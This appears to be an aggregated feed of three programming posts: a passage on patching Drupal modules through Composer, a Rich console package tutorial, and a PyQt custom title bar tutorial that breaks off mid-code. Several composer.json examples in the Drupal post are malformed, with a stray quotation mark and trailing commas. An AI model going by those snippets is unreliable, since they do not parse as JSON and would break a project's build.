{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9" } } }, { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { }, "patchLevel": { "drupal/core": "-p2" }, } }Now let’s change our version criteria:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9 || ^10" } …And then add our patch:
… extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } …Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } …Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Our final composer.json for our project could look something like this with all the edits:
{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } } }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }The pros:
- Uses more core Composer functionality
- A PHP developer will better understand what’s going on here
- You are in complete control of how this module package and version are defined
- All the work is in one file
The cons:
- Requires some understanding of how composer.json, packagists, and the magic of Drupal’s packagist all work
- That’s a messy composer.json for the project
- If you have to use exclude, you have to leave it up to outside forces to let you know when that module does finally put out an actual D10-ready version, and then undo all of this work
Standard PHP Composer best practice says that if you make modifications to a package, fork it, maintain your modifications, and provide a pull request if it’s functionality you wish to contribute back. You can use this same approach with Drupal modules as well. Some may even say that’s what issue forks are for! That said, issue forks come with the downside that sometimes they go away, or are overridden with changes you don’t want. They are a moving target.
For the sake of this example, let’s assume that we have forked the module on GitHub to https://github.com/fourkitchens/context_active_trail.git. If you don’t know how to make a fork, simply do the following:
- Clone the module to your local computer using the git instructions for the module in question
- Check out the branch you want to base your changes on
- Create a new repository on GitHub
- Add it as a remote git remote add github git@github.com:fourkitchens/context_active_trail.git
- Push it! git push github 8.x-2.x
You can do this with a version of the module that is in a merge request in Drupal.org’s issue queue, too. That way you won’t have to reapply all the changes. However, if your changes are in a patch file, consider adding them to the module at this time using your favorite patching method. Push all your changes to the github remote.
If the patch files don’t have changes to composer.json, or if the module doesn’t have one, you will likely want to provide at least a bare-bones one that contains something like the following and commit it:
{ "name": "drupal/context_active_trail", "type": "drupal-module", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } }This will tell Composer what it needs to know inside the project about dependencies. This project already had a composer.json, so I needed to add the changes from the patch to it.
Inside our Drupal project we are working on, we need to add a new entry to the repositories section. It will look something like this:
{ "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" },The VCS type repository entry tells Composer to look at the repository and poll for all its branches and tags. These will be your new version numbers.
Much like in the “Custom Package” example, you may need to add an exclude property to the Drupal packagist entry.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Now, since Drupal packagist isn’t here to give Composer some version aliases, we have to use the old notation dev-BRANCHNAME for our version. Our require entry will look something like this:
"drupal/context_active_trail": "dev-8.x-2.x",Since we already added our patches as a commit to the module, this is all you need. Your final composer.json for your project would look like this:
{ "name": "vendor/project", "repositories": [ { "type": "vcs", "url": "https://github.com/fourkitchens/context_active_trail.git" }, { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "dev-8.x-2.x", } }It makes for a much cleaner project json, but now you’ve split the work into two locations, requiring some synchronization. However, if multiple sites of yours use this same module and need the same fixes, this absolutely has the least resistance and ability to get those changes out more quickly.
The pros:
- Reusability
- Two smaller, simpler chunks of work
- Any PHP developer should be able to debug this setup as it uses Composer best practices. This method will be used in any project with any framework in the PHP ecosystem.
The cons:
- Changes are in two separate places
- Which patches are applied isn’t obvious in the composer.json and require looking through the commit history on the forked repository
- Requires maintenance and synchronization when upgrades happen
As with almost everything out there, there are multiple ways to achieve the same goal. I hope this brings awareness, and helps provide the flexibility you need when upgrading Drupal to a new major version. Obviously, each solution has strengths, and you may need to mix it up to get the results you want.
The post Using Composer for modules not ready for the next major version of Drupal appeared first on Four Kitchens.
Real Python: The Python Rich Package: Unleash the Power of Console Text
Python’s Rich package is a tool kit that helps you generate beautifully formatted and highlighted text in the console. More broadly, it allows you to build an attractive text-based user interface (TUI).
Why would you choose a TUI over a graphical user interface, or GUI? Sometimes a text display feels more appropriate. Why use a full-blown GUI for a simple application, when an elegant text interface will do? It can be refreshing to work with plain text. Text works in almost any hardware environment, even on an SSH terminal or a single-board computer display. And many applications don’t need the complexity of a full graphical windowing system.
In this tutorial, you’ll learn how Rich can help you:
- Enhance the user interface of command-line tools
- Improve the readability of console output
- Create attractive dashboard displays for real-time tabular data
- Generate well-formatted reports
Will McGugan, the author of Rich, has also developed the Textual package. Whereas Rich is a rich-text tool kit, Textual is a full application framework built on Rich. It provides application base classes, an event-driven architecture, and more.
There’s a lot you can do with Rich on its own, and its support for engaging, dynamic displays may well be sufficient for your app. By following this tutorial, you’ll experiment with many of the cool features of Rich, and you’ll finish up by using your skills to build a dynamically scrolling tabular display of crypto prices:
To fully understand Rich’s syntax for animations, you should have a good grasp of context managers. But if you’re a bit rusty, don’t worry! You’ll get a quick refresher in this tutorial.
Get Your Code: Click here to download free sample code that shows you how to use Rich for more beautiful Python code and apps.
Installing Rich
You can start using Rich very quickly. As always when starting a new project or investigation, it’s best to create a virtual environment first, to avoid polluting your system’s Python installation.
It’s quite possible to install Rich and use it with the built-in Python REPL, but for a better developer experience, you may want to include support for Jupyter notebooks. Here’s how you can install Rich so that it’ll work with either the REPL or Jupyter:
Windows PowerShell
PS> python -m venv venv
PS> venv\Scripts\activate
(venv) PS> python -m pip install rich[jupyter]

Shell
$ python -m venv venv
$ source venv/bin/activate
(venv) $ python -m pip install "rich[jupyter]"

Now that you’ve installed Rich in your new virtual environment, you can test it and also get a nice overview of its capabilities:
Shell
(venv) $ python -m rich

Running this command will make lots of magic happen. Your terminal will fill with color, and you’ll see several options for customizing your text-based user interface:
Apart from displaying colorful text in a variety of styles, this demo also illustrates a few more of Rich’s exciting features.
You can wrap and justify text. You can easily display any Unicode characters, as well as a wide choice of emojis. Rich renders Markdown and offers a syntax for creating elegantly formatted tables.
There’s much more that you can do with Rich, as you’ll discover throughout this tutorial. You can also try some of the command-line demos that Rich has thoughtfully provided for its subpackages, so you can get a flavor of what each one can do without writing any code.
Here are a few that you can try from your OS console. Execute them one by one to get a feel for the power of Rich:
Shell
(venv) $ python -m rich.table
(venv) $ python -m rich.progress
(venv) $ python -m rich.status

Most of these demos are very short, but if necessary, you can always interrupt them with Ctrl+C.
With the installation done, you’re ready to start exploring Rich.
Read the full article at https://realpython.com/python-rich-package/ »
Python GUIs: How to Create a Custom Title Bar for a PyQt Window — Customize Your Python App's Title Bars
PyQt provides plenty of tools for creating unique and visually appealing graphical user interfaces (GUIs). One aspect of your applications that you may not have considered customizing is the title bar. The title bar is the topmost part of the window, where your users find the app's name, window controls & other elements.
This part of the window is usually drawn by the operating system or desktop environment, and its default look & feel may not gel well with the rest of your application. However, you may want to customize it to add additional functionality. For example, in web browsers the document tabs are now typically collapsed into the title bar to maximize available space for viewing pages.
In this tutorial, you will learn how to create custom title bars in PyQt. By the end of this tutorial, you will have the necessary knowledge to enhance your PyQt applications with personalized and (hopefully!) stylish title bars.
Table of Contents
- Creating Frameless Windows in PyQt
- Setting Up the Main Window
- Creating a Custom Title Bar for a PyQt Window
- Updating the Window's State
- Handling Window's Moves
- Making it a little more beautiful
- Conclusion
The first step to providing a PyQt application with a custom title bar is to remove the default title bar and window decoration provided by the operating system. If we don't take this step, we'll end up with multiple title bars at the top of our windows.
In PyQt, we can create a frameless window using the setWindowFlags() method available on all QWidget subclasses, including QMainWindow. We call this method, passing in the FramelessWindowHint flag, which lives in the Qt namespace under the WindowType enumeration.
Here's the code of a minimal PyQt app whose main window is frameless:
python
from PyQt6.QtCore import Qt
from PyQt6.QtWidgets import QApplication, QMainWindow

class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Custom Title Bar")
        self.resize(400, 200)
        self.setWindowFlags(Qt.WindowType.FramelessWindowHint)

if __name__ == "__main__":
    app = QApplication([])
    window = MainWindow()
    window.show()
    app.exec()

After importing the required classes, we create a window by subclassing QMainWindow. In the class initializer method, we set the window's title and resize the window using the resize() method. Then we use setWindowFlags() to make the window frameless. The rest is the usual boilerplate code for creating PyQt applications.
If you run this app from your command line, you'll get the following window on your screen:
A frameless window in PyQt
As you can see, the app's main window doesn't have a title bar or any other decoration. It's only a gray rectangle on your screen.
Because the window has no buttons, you need to press Alt-F4 on Windows and Linux or Cmd+Q on macOS to close the app.
This isn't very helpful, of course, but we'll be adding back in our custom title bar shortly.
Setting Up the Main Window
Before creating our custom title bar, we'll finish the initialization of our app's main window, import some additional classes and create the window's central widget and layouts.
Here's the code update:
python
from PyQt6.QtCore import Qt
from PyQt6.QtWidgets import (
    QApplication,
    QLabel,
    QMainWindow,
    QVBoxLayout,
    QWidget,
)

class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Custom Title Bar")
        self.resize(400, 200)
        self.setWindowFlags(Qt.WindowType.FramelessWindowHint)

        central_widget = QWidget()
        self.title_bar = CustomTitleBar(self)

        work_space_layout = QVBoxLayout()
        work_space_layout.setContentsMargins(11, 11, 11, 11)
        work_space_layout.addWidget(QLabel("Hello, World!", self))

        centra_widget_layout = QVBoxLayout()
        centra_widget_layout.setContentsMargins(0, 0, 0, 0)
        centra_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop)
        centra_widget_layout.addWidget(self.title_bar)
        centra_widget_layout.addLayout(work_space_layout)

        central_widget.setLayout(centra_widget_layout)
        self.setCentralWidget(central_widget)

# ...

First, we import the QLabel, QVBoxLayout, and QWidget classes. In our window's initializer, we create a central widget by instantiating QWidget(). Next, we create an instance attribute called title_bar by instantiating a class called CustomTitleBar. We still need to implement this class -- we'll do this in a moment.
The next step is to create a layout for our window's workspace. In this example, we're using a QVBoxLayout, but you can use whichever layout best fits your needs. We also set some margins for the layout's contents and add a label containing the phrase "Hello, World!".
Next, we create a global layout for our central widget. Again, we use a QVBoxLayout. We set the layout's margins to 0 and align it to the top of our frameless window. In this layout, we add the title bar at the top and the workspace below it. Finally, we set the central widget's layout and the app's central widget.
That's it! We have all the boilerplate code we need for our window to work correctly. Now we're ready to write our custom title bar.
Creating a Custom Title Bar for a PyQt Window
In this section, we will create a custom title bar for our main window. To do this, we will create a new class by inheriting from QWidget. First, go ahead and update your imports like in the code below:
```python
from PyQt6.QtCore import QSize, Qt
from PyQt6.QtGui import QPalette
from PyQt6.QtWidgets import (
    QApplication,
    QHBoxLayout,
    QLabel,
    QMainWindow,
    QStyle,
    QToolButton,
    QVBoxLayout,
    QWidget,
)

# ...
```
Here, we've imported a few new classes. We will use these classes as building blocks for our title bar. Without further ado, let's get into the title bar code. We'll introduce the code in small consecutive chunks to facilitate the explanation. Here's the first piece:
```python
# ...

class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        self.setAutoFillBackground(True)
        self.setBackgroundRole(QPalette.ColorRole.Highlight)
        self.initial_pos = None
        title_bar_layout = QHBoxLayout(self)
        title_bar_layout.setContentsMargins(1, 1, 1, 1)
        title_bar_layout.setSpacing(2)
```
In this code snippet, we create a new class by inheriting from QWidget. This way, our title bar will have all the standard features and functionality of any PyQt widget. In the class initializer, we set autoFillBackground to True because we want to give the bar a custom color. The next line of code sets the title bar's background color to QPalette.ColorRole.Highlight, which is a blueish color.
The next line of code creates and initializes an instance attribute called initial_pos. We'll use this attribute later on when we deal with moving the window around our screen.
The final three lines of code allow us to create a layout for our title bar. Because the title bar should be horizontally oriented, we use a QHBoxLayout class to structure it.
The piece of code below deals with our window's title:
```python
# ...

class CustomTitleBar(QWidget):
    def __init__(self, parent):
        # ...
        self.title = QLabel(f"{self.__class__.__name__}", self)
        self.title.setStyleSheet(
            """font-weight: bold;
               border: 2px solid black;
               border-radius: 12px;
               margin: 2px;
            """
        )
        self.title.setAlignment(Qt.AlignmentFlag.AlignCenter)
        if title := parent.windowTitle():
            self.title.setText(title)
        title_bar_layout.addWidget(self.title)
```
The first line of new code creates a title attribute. It's a QLabel object that will hold the window's title. Because we want to build a cool title bar, we'd like to add some custom styling to the title. To do this, we use the setStyleSheet() method with a string representing a CSS style sheet as an argument. The style sheet tweaks the font, borders, and margins of our title label.
Next, we center the title using the setAlignment() method with the Qt.AlignmentFlag.AlignCenter flag as an argument.
In the conditional statement, we check whether our window has a title. If that's the case, we set the text of our title label to the current window's title. Finally, we add the title label to the title bar layout.
The next step in our journey to build a custom title bar is to provide standard window controls. In other words, we need to add the minimize, maximize, close, and normal buttons. These buttons will allow our users to interact with our window. To create the buttons, we'll use the QToolButton class.
Here's the required code:
```python
# ...

class CustomTitleBar(QWidget):
    def __init__(self, parent):
        # ...
        # Min button
        self.min_button = QToolButton(self)
        min_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarMinButton
        )
        self.min_button.setIcon(min_icon)
        self.min_button.clicked.connect(self.window().showMinimized)

        # Max button
        self.max_button = QToolButton(self)
        max_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarMaxButton
        )
        self.max_button.setIcon(max_icon)
        self.max_button.clicked.connect(self.window().showMaximized)

        # Close button
        self.close_button = QToolButton(self)
        close_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarCloseButton
        )
        self.close_button.setIcon(close_icon)
        self.close_button.clicked.connect(self.window().close)

        # Normal button
        self.normal_button = QToolButton(self)
        normal_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarNormalButton
        )
        self.normal_button.setIcon(normal_icon)
        self.normal_button.clicked.connect(self.window().showNormal)
        self.normal_button.setVisible(False)
```
In this code snippet, we define all the required buttons by instantiating the QToolButton class. The minimize, maximize, and close buttons follow the same pattern. We create the button, define an icon for the button at hand, and set the icon using the setIcon() method.
Note that we use the standard icons that PyQt provides. For example, the minimize button uses the SP_TitleBarMinButton icon. Similarly, the maximize and close buttons use the SP_TitleBarMaxButton and SP_TitleBarCloseButton icons. We find all these icons in the QStyle.StandardPixmap namespace.
Finally, we connect each button's clicked() signal to the appropriate slot. For the minimize button, the proper slot is .showMinimized(). For the maximize and close buttons, the right slots are .showMaximized() and .close(), respectively. All these slots are part of the main window's class.
The normal button at the end of the above code uses the SP_TitleBarNormalButton icon and showNormal() slot. This button has an extra setting. We've set its visibility to False, meaning that the button will be hidden by default. It'll only appear when we maximize the window to allow us to return to the normal state.
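As an aside, if you'd like to browse the other built-in icons that could be used for these buttons, a quick standalone sketch (not part of the tutorial's code) is to iterate over the members of QStyle.StandardPixmap and check which ones the current platform style provides:
```python
from PyQt6.QtWidgets import QApplication, QStyle

# Standalone helper: print every standard pixmap name so you can pick icons.
app = QApplication([])
style = app.style()
for name in dir(QStyle.StandardPixmap):
    if name.startswith("SP_"):
        icon = style.standardIcon(getattr(QStyle.StandardPixmap, name))
        status = "available" if not icon.isNull() else "empty on this platform"
        print(f"{name}: {status}")
```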
Now that we've created and tweaked the buttons, we must add them to our title bar. To do this, we can use the following for loop:
```python
# ...

class CustomTitleBar(QWidget):
    def __init__(self, parent):
        # ...
        buttons = [
            self.min_button,
            self.normal_button,
            self.max_button,
            self.close_button,
        ]
        for button in buttons:
            button.setFocusPolicy(Qt.FocusPolicy.NoFocus)
            button.setFixedSize(QSize(28, 28))
            button.setStyleSheet(
                """QToolButton {
                    border: 2px solid white;
                    border-radius: 12px;
                }
                """
            )
            title_bar_layout.addWidget(button)
```
This loop iterates over our four buttons in a predefined order. The first thing we do inside the loop is define the focus policy of each button. We don't want these buttons to steal focus from buttons in the window's working space, so we set their focus policy to NoFocus.
Next, we set a fixed size of 28 by 28 pixels for each of the four buttons using the setFixedSize() method with a QSize object as an argument.
Our main goal in this section is to create a custom title bar. A handy way to customize the look and feel of PyQt widgets is to use CSS style sheets. In the above piece of code, we use the setStyleSheet() method to apply a custom CSS style sheet to our four buttons. The sheet defines a white and round border for each button.
The final line in the above code calls the addWidget() method to add each custom button to our title bar's layout. That's it! We're now ready to give our title bar a try. Go ahead and run the application from your command line. You'll see a window like the following:
A PyQt window with a custom title bar
This is pretty simple styling, but you get the idea. You can tweak the title bar further, depending on your needs. For example, you can change the colors and borders, customize the title's font, add other widgets to the bar, and more.
We'll apply some nicer styles later, once we have the functionality in place! Keep reading.
Even though the title bar looks different, it has limited functionality. For example, if you click the maximize button, then the window will change to its maximized state. However, the normal button won't show up to allow you to return the window to its previous state.
In addition to this, if you try to move the window around your screen, you'll quickly notice a problem: it's impossible to move the window!
In the following sections, we'll write the necessary code to fix these issues and make our custom title bar fully functional. To kick things off, let's start by fixing the state issues.
Updating the Window's State
To fix the issue related to the window's state, we'll write two new methods: we need to override one method and write another. In the MainWindow class, we'll override the changeEvent() method. The changeEvent() method is called directly by Qt whenever the window state changes, for example when the window is maximized or hidden. By overriding this event we can add our own custom behavior.
Here's the code that overrides the changeEvent() method:
```python
from PyQt6.QtCore import QSize, Qt, QEvent

# ...

class MainWindow(QMainWindow):
    # ...
    def changeEvent(self, event):
        if event.type() == QEvent.Type.WindowStateChange:
            self.title_bar.window_state_changed(self.windowState())
        super().changeEvent(event)
        event.accept()
```
This method is fairly straightforward. We check the event type to see if it is a WindowStateChange. If that's the case, we call the window_state_changed() method of our custom title bar, passing the current window's state as an argument. In the final two lines, we call the parent class's changeEvent() method and accept the event to signal that we've correctly processed it.
Here's the implementation of our window_state_changed() method:
```python
# ...

class CustomTitleBar(QWidget):
    # ...
    def window_state_changed(self, state):
        if state == Qt.WindowState.WindowMaximized:
            self.normal_button.setVisible(True)
            self.max_button.setVisible(False)
        else:
            self.normal_button.setVisible(False)
            self.max_button.setVisible(True)
```
This method takes a window's state as an argument. Depending on the value of the state parameter, we show or hide the maximize and restore buttons.
If the window is currently maximized, we show the normal button and hide the maximize button. Otherwise, we hide the normal button and show the maximize button.
The effect of this, together with the order in which we added the buttons above, is that when you maximize the window, the maximize button appears to be replaced with the normal button. When you restore the window to its normal size, the normal button is replaced with the maximize button.
Go ahead and run the app again. Click the maximize button. You'll note that when the window gets maximized, the middle button changes its icon. Now you have access to the normal button. If you click it, then the window will recover its previous state.
Handling Window's Moves
Now it's time to write the code that enables us to move the window around the screen while holding the mouse's left button on the title bar. To fix this issue, we only need to add code to the CustomTitleBar class.
In particular, we need to override three mouse events:
- mousePressEvent() will let us know when the user clicks on our custom title bar using the mouse's left-click button. This may indicate that the window movement should start.
- mouseMoveEvent() will let us process the window movements.
- mouseReleaseEvent() will let us know when the user has released the mouse's left-click button so that we can stop moving the window.
Here's the code that overrides the mousePressEvent() method:
```python
# ...

class CustomTitleBar(QWidget):
    # ...
    def mousePressEvent(self, event):
        if event.button() == Qt.MouseButton.LeftButton:
            self.initial_pos = event.position().toPoint()
        super().mousePressEvent(event)
        event.accept()
```
In this method, we first check whether the user clicked on the title bar with the mouse's left button. If that's the case, then we update our initial_pos attribute to the clicked point. Remember that we defined initial_pos and initialized it to None back in the __init__() method of CustomTitleBar.
Next, we need to override the mouseMoveEvent() method. Here's the required code:
```python
# ...

class CustomTitleBar(QWidget):
    # ...
    def mouseMoveEvent(self, event):
        if self.initial_pos is not None:
            delta = event.position().toPoint() - self.initial_pos
            self.window().move(
                self.window().x() + delta.x(),
                self.window().y() + delta.y(),
            )
        super().mouseMoveEvent(event)
        event.accept()
```
The if statement in mouseMoveEvent() checks whether the initial_pos attribute is not None. If this condition is true, then the if code block executes because we have a valid initial position.
The first line in the if code block calculates the difference, or delta, between the current and initial mouse positions. To get the current position, we call the position() method on the event object and convert that position into a QPoint object using the toPoint() method.
The following four lines update the position of our application's main window by adding the delta values to the current window position. The move() method does the hard work of moving the window.
In summary, this code updates the window position based on the movement of our mouse. It tracks the initial position of the mouse, calculates the difference between the initial position and the current position, and applies that difference to the window's position.
Finally, we can complete the mouseReleaseEvent() method:
```python
# ...

class CustomTitleBar(QWidget):
    # ...
    def mouseReleaseEvent(self, event):
        self.initial_pos = None
        super().mouseReleaseEvent(event)
        event.accept()
```
This method's implementation is pretty straightforward. Its purpose is to reset the initial position by setting it back to None when the mouse is released, indicating that the drag is complete.
That's it! Go ahead and run your app again. Click on your custom title bar and move the window around while holding the mouse's left-click button. Can you move the window? Great! Your custom title bar is now fully functional.
The completed code for the custom title bar is shown below.
```python
from PyQt6.QtCore import QSize, Qt, QEvent
from PyQt6.QtGui import QPalette
from PyQt6.QtWidgets import (
    QApplication,
    QHBoxLayout,
    QLabel,
    QMainWindow,
    QStyle,
    QToolButton,
    QVBoxLayout,
    QWidget,
)


class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        self.setAutoFillBackground(True)
        self.setBackgroundRole(QPalette.ColorRole.Highlight)
        self.initial_pos = None
        title_bar_layout = QHBoxLayout(self)
        title_bar_layout.setContentsMargins(1, 1, 1, 1)
        title_bar_layout.setSpacing(2)

        self.title = QLabel(f"{self.__class__.__name__}", self)
        self.title.setStyleSheet(
            """font-weight: bold;
               border: 2px solid black;
               border-radius: 12px;
               margin: 2px;
            """
        )
        self.title.setAlignment(Qt.AlignmentFlag.AlignCenter)
        if title := parent.windowTitle():
            self.title.setText(title)
        title_bar_layout.addWidget(self.title)

        # Min button
        self.min_button = QToolButton(self)
        min_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarMinButton
        )
        self.min_button.setIcon(min_icon)
        self.min_button.clicked.connect(self.window().showMinimized)

        # Max button
        self.max_button = QToolButton(self)
        max_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarMaxButton
        )
        self.max_button.setIcon(max_icon)
        self.max_button.clicked.connect(self.window().showMaximized)

        # Close button
        self.close_button = QToolButton(self)
        close_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarCloseButton
        )
        self.close_button.setIcon(close_icon)
        self.close_button.clicked.connect(self.window().close)

        # Normal button
        self.normal_button = QToolButton(self)
        normal_icon = self.style().standardIcon(
            QStyle.StandardPixmap.SP_TitleBarNormalButton
        )
        self.normal_button.setIcon(normal_icon)
        self.normal_button.clicked.connect(self.window().showNormal)
        self.normal_button.setVisible(False)

        # Add buttons
        buttons = [
            self.min_button,
            self.normal_button,
            self.max_button,
            self.close_button,
        ]
        for button in buttons:
            button.setFocusPolicy(Qt.FocusPolicy.NoFocus)
            button.setFixedSize(QSize(28, 28))
            button.setStyleSheet(
                """QToolButton {
                    border: 2px solid white;
                    border-radius: 12px;
                }
                """
            )
            title_bar_layout.addWidget(button)

    def window_state_changed(self, state):
        if state == Qt.WindowState.WindowMaximized:
            self.normal_button.setVisible(True)
            self.max_button.setVisible(False)
        else:
            self.normal_button.setVisible(False)
            self.max_button.setVisible(True)

    def mousePressEvent(self, event):
        if event.button() == Qt.MouseButton.LeftButton:
            self.initial_pos = event.position().toPoint()
        super().mousePressEvent(event)
        event.accept()

    def mouseMoveEvent(self, event):
        if self.initial_pos is not None:
            delta = event.position().toPoint() - self.initial_pos
            self.window().move(
                self.window().x() + delta.x(),
                self.window().y() + delta.y(),
            )
        super().mouseMoveEvent(event)
        event.accept()

    def mouseReleaseEvent(self, event):
        self.initial_pos = None
        super().mouseReleaseEvent(event)
        event.accept()


class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Custom Title Bar")
        self.resize(400, 200)
        self.setWindowFlags(Qt.WindowType.FramelessWindowHint)

        central_widget = QWidget()
        self.title_bar = CustomTitleBar(self)

        work_space_layout = QVBoxLayout()
        work_space_layout.setContentsMargins(11, 11, 11, 11)
        work_space_layout.addWidget(QLabel("Hello, World!", self))

        central_widget_layout = QVBoxLayout()
        central_widget_layout.setContentsMargins(0, 0, 0, 0)
        central_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop)
        central_widget_layout.addWidget(self.title_bar)
        central_widget_layout.addLayout(work_space_layout)
        central_widget.setLayout(central_widget_layout)

        self.setCentralWidget(central_widget)

    def changeEvent(self, event):
        if event.type() == QEvent.Type.WindowStateChange:
            self.title_bar.window_state_changed(self.windowState())
        super().changeEvent(event)
        event.accept()


if __name__ == "__main__":
    app = QApplication([])
    window = MainWindow()
    window.show()
    app.exec()
```
Making it a little more beautiful
So far we've covered the technical aspects of styling our window with a custom title bar, and added the code to make it function as expected. But it doesn't look great. In this section we'll take our existing code & tweak the styling and buttons to produce something that's a little more professional looking.
One common reason for wanting to apply custom title bars to a window is to integrate the title bar with the rest of the application. This technique is called a unified title bar and can be seen in some popular applications such as web browsers, or Spotify.
In this section we'll look at how we can reproduce the same effect in PyQt using a combination of stylesheets & icons. Below is a screenshot of the final result which we'll be building.
As you can see, the window and the title bar blend nicely together and the window has rounded corners. There are a few different ways to do this, but we'll cover a simple approach using Qt stylesheets to apply styling over the entire window.
In order to customize the shape of the window, we need to first tell the OS to stop drawing the default window outline and background for us. We do that by setting a window attribute on the window. This is similar to the flags we already discussed, in that it turns on & off different window manager behaviors.
```python
# ...

class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Custom Title Bar")
        self.resize(400, 200)
        self.setWindowFlags(Qt.WindowType.FramelessWindowHint)
        self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)
        # ...
```
We've added a call to self.setAttribute which sets the attribute Qt.WidgetAttribute.WA_TranslucentBackground on the window. If you run the code now, you will see the window has become transparent, with only the widget text and title bar visible.
Next we'll tell Qt to draw a new custom background for us. If you've worked with QSS before, the most obvious way to apply curved edges to the window using QSS stylesheets would be to set border-radius: styles on the main window directly, e.g.
```python
# ...

class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        # ...
        self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)
        self.setStyleSheet("background-color: gray; border-radius: 10px;")
        # ...
```
However, if you try this you'll notice that it doesn't work. If you enable a translucent background, the background of the window is not drawn (including your styles). If you don't set a translucent background, the window is filled to the edges with a solid color, ignoring the border radius.
The good news is that, with a bit of lateral thinking, there is a simple solution. We already know that we can construct interfaces by nesting widgets in layouts. Since we can't style the border-radius of a window, but we can style any other widget, the solution is to simply add a container widget into our window & apply the curved-edge and background styles to that.
On our MainWindow object we already have a central widget which contains our layout, so we can apply the styles there.
```python
class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        # ...
        central_widget = QWidget()
        # This container holds the window contents, so we can style it.
        central_widget.setObjectName("Container")
